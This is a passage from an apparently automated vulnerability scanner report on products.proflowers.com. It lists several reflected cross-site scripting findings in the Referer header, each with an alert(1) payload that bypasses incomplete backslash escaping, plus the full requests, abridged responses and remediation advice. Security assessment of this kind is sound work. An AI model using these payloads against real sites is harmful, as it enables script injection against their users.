Set-Cookie: BrowsingStore=awkoe1fox4ydwxn0rfnrqthf; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=awkoe1fox4ydwxn0rfnrqthf; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-1,cnd-32,pvo-1,pbr-3,psk-1,pps-2,poe-1,zzc-1,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-1,peo-1,pfp-1,phr-1,zza-2,psv-4,nta-2,ntb-1,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-7,zzb-1,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:00 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:00 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=20; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:00 GMT; path=/
Set-Cookie: PFC_BrowserId=3c055a58-cf0a-48e6-961c-87722f9c04fa; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30000122&12/16/2010 11:55:04 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:05 GMT
Connection: close
Content-Length: 145122


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30000122","30000122","30000122","255166","20","organicgglgeneric_de17e\\";alert(1)//5414c7fdcb2","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-1,cnd-32,pvo-1,pbr-3,pcy-7,psk-1,poe-1,zzc-1,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-1,peo-1,pfp-1,phr-1,pjt-1,psv-4,
...[SNIP]...

2.143. http://products.proflowers.com/flowers/Joyful-Bouquet-41754 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Joyful-Bouquet-41754

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d94c4\"%3balert(1)//0be9dbb8050 was submitted in the Referer HTTP header. This input was echoed as d94c4\\";alert(1)//0be9dbb8050 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Joyful-Bouquet-41754 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d94c4\"%3balert(1)//0be9dbb8050

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=k301ngahimwtctw2ogkqfk55; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=k301ngahimwtctw2ogkqfk55; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-1,cnd-34,pvo-1,pbr-3,psk-1,pps-1,poe-2,zzc-2,pjs-3,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-2,nte-3,ntc-2,peo-2,pfp-1,phr-1,zza-1,psv-3,nta-1,ntb-1,pmo-1,ppr-1,spg-2,xpc-1,psr-2,pcy-7,zzb-2,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:56 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:56 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=145; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:56 GMT; path=/
Set-Cookie: PFC_BrowserId=73f520d1-d9fd-423d-b606-e1f9d79f3112; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=41754&12/16/2010 11:54:57 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:58 GMT
Connection: close
Content-Length: 191046


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
darOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("41754","41754","41754","294787","145","organicgglgeneric_d94c4\\";alert(1)//0be9dbb8050","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-1,cnd-34,pvo-1,pbr-3,pcy-7,psk-1,poe-2,zzc-2,pjs-3,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-2,nte-3,ntc-2,peo-2,pfp-1,phr-1,pjt-1,psv-3,
...[SNIP]...

2.144. http://products.proflowers.com/flowers/Roses-in-the-Snow-wElegant-Ruby-Vase-30001058 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Roses-in-the-Snow-wElegant-Ruby-Vase-30001058

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6f2b\"%3balert(1)//73fb417ae80 was submitted in the Referer HTTP header. This input was echoed as f6f2b\\";alert(1)//73fb417ae80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Roses-in-the-Snow-wElegant-Ruby-Vase-30001058 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f6f2b\"%3balert(1)//73fb417ae80

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=0rldbf0iex2mi0xe0qp2a2gi; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=0rldbf0iex2mi0xe0qp2a2gi; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-2,cnd-32,pvo-2,pbr-4,psk-2,pps-1,poe-1,zzc-1,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-2,peo-2,pfp-1,phr-2,zza-2,psv-4,nta-2,ntb-1,pmo-1,ppr-1,spg-2,xpc-1,psr-1,pcy-5,zzb-2,gfr-2,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:18 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:18 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=65; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:18 GMT; path=/
Set-Cookie: PFC_BrowserId=d011630f-7dc9-44eb-8e52-7a6f2b8064e7; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30001058&12/16/2010 11:54:19 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:20 GMT
Connection: close
Content-Length: 159534


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30001058","30001058","30001058","384731","65","organicgglgeneric_f6f2b\\";alert(1)//73fb417ae80","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-2,cnd-32,pvo-2,pbr-4,pcy-5,psk-2,poe-1,zzc-1,pjs-2,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-2,peo-2,pfp-1,phr-2,pjt-2,psv-4,
...[SNIP]...

2.145. http://products.proflowers.com/flowers/Santas-Boots-30045234 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Santas-Boots-30045234

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d367\"%3balert(1)//e621e22a007 was submitted in the Referer HTTP header. This input was echoed as 1d367\\";alert(1)//e621e22a007 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Santas-Boots-30045234 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1d367\"%3balert(1)//e621e22a007

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wcl15wzaqovirv3tdysco0t3; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=wcl15wzaqovirv3tdysco0t3; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-2,cnd-30,pvo-1,pbr-3,psk-1,pps-2,poe-2,zzc-2,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-2,peo-2,pfp-2,phr-2,zza-2,psv-3,nta-1,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-8,zzb-1,gfr-2,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:00 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:00 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=98; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:00 GMT; path=/
Set-Cookie: PFC_BrowserId=29187d8e-a12b-48e1-91bc-7300035e50c2; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30045234&12/16/2010 11:54:02 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:02 GMT
Connection: close
Content-Length: 121488


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30045234","30045234","30045234","399741","98","organicgglgeneric_1d367\\";alert(1)//e621e22a007","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-1,cnd-30,pvo-1,pbr-3,pcy-8,psk-1,poe-2,zzc-2,pjs-1,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-2,peo-2,pfp-2,phr-2,pjt-2,psv-3,
...[SNIP]...

2.146. http://products.proflowers.com/flowers/Santas-Sleigh-Centerpiece-42064 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Santas-Sleigh-Centerpiece-42064

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fa23\"%3balert(1)//46f73acf067 was submitted in the Referer HTTP header. This input was echoed as 8fa23\\";alert(1)//46f73acf067 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Santas-Sleigh-Centerpiece-42064 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8fa23\"%3balert(1)//46f73acf067

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=2nkvulfih4c0swsno4vm0ivj; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=2nkvulfih4c0swsno4vm0ivj; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-2,cnd-32,pvo-2,pbr-4,psk-1,pps-2,poe-2,zzc-1,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-2,peo-1,pfp-1,phr-2,zza-1,psv-4,nta-1,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-2,pcy-5,zzb-1,gfr-2,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:10 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:10 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=85; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:10 GMT; path=/
Set-Cookie: PFC_BrowserId=7880a27e-0080-4544-bde7-0156ef1b7b77; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=42064&12/16/2010 11:54:13 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:14 GMT
Connection: close
Content-Length: 145082


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
dCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("42064","42064","42064","0","85","organicgglgeneric_8fa23\\";alert(1)//46f73acf067","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-32,pvo-2,pbr-4,pcy-5,psk-1,poe-2,zzc-1,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-2,nte-3,ntc-2,peo-1,pfp-1,phr-2,pjt-2,psv-4,
...[SNIP]...

2.147. http://products.proflowers.com/flowers/Santas-Workshop-30045400 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Santas-Workshop-30045400

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33d1e\"%3balert(1)//ffb3ad6d15b was submitted in the Referer HTTP header. This input was echoed as 33d1e\\";alert(1)//ffb3ad6d15b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Santas-Workshop-30045400 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=33d1e\"%3balert(1)//ffb3ad6d15b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=j0qgd30yuvounpjnp1jyoepc; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=j0qgd30yuvounpjnp1jyoepc; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-31,pvo-1,pbr-3,psk-1,pps-2,poe-1,zzc-2,pjs-1,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-1,peo-1,pfp-2,phr-1,zza-2,psv-3,nta-1,ntb-2,pmo-1,ppr-2,spg-2,xpc-1,psr-1,pcy-7,zzb-2,gfr-2,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:53:41 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:53:41 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=49; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:53:41 GMT; path=/
Set-Cookie: PFC_BrowserId=27e118f7-1710-4ad1-a903-76daa2f10b3d; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30045400&12/16/2010 11:53:42 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:53:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:53:42 GMT
Connection: close
Content-Length: 144440


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30045400","30045400","30045400","395699","49","organicgglgeneric_33d1e\\";alert(1)//ffb3ad6d15b","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-2,cnd-31,pvo-1,pbr-3,pcy-7,psk-1,poe-1,zzc-2,pjs-1,pcu-1,spg-2,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-1,peo-1,pfp-2,phr-1,pjt-1,psv-3,
...[SNIP]...

2.148. http://products.proflowers.com/flowers/Seasons-Greetings-Gift-Basket-30043845 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Seasons-Greetings-Gift-Basket-30043845

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25dea\"%3balert(1)//1949b499df6 was submitted in the Referer HTTP header. This input was echoed as 25dea\\";alert(1)//1949b499df6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Seasons-Greetings-Gift-Basket-30043845 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=25dea\"%3balert(1)//1949b499df6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=lsqezgothlrylii2l0haadfx; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=lsqezgothlrylii2l0haadfx; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-2,cnd-34,pvo-2,pbr-3,psk-1,pps-2,poe-1,zzc-1,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-2,nte-2,ntc-1,peo-2,pfp-1,phr-1,zza-2,psv-4,nta-2,ntb-1,pmo-1,ppr-2,spg-1,xpc-1,psr-1,pcy-5,zzb-2,gfr-2,apg-1,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:55:25 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:55:25 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=15; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:55:25 GMT; path=/
Set-Cookie: PFC_BrowserId=908e6a1f-c216-4ec8-a923-8696fb2329cf; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30043845&12/16/2010 11:55:26 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:55:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:55:26 GMT
Connection: close
Content-Length: 190248


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
OnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30043845","30043845","30043845","0","15","organicgglgeneric_25dea\\";alert(1)//1949b499df6","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-34,pvo-2,pbr-3,pcy-5,psk-1,poe-1,zzc-1,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-2,nte-2,ntc-1,peo-2,pfp-1,phr-1,pjt-2,psv-4,
...[SNIP]...

2.149. http://products.proflowers.com/flowers/Shower-of-Flowers-30004467 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Shower-of-Flowers-30004467

Issue detail

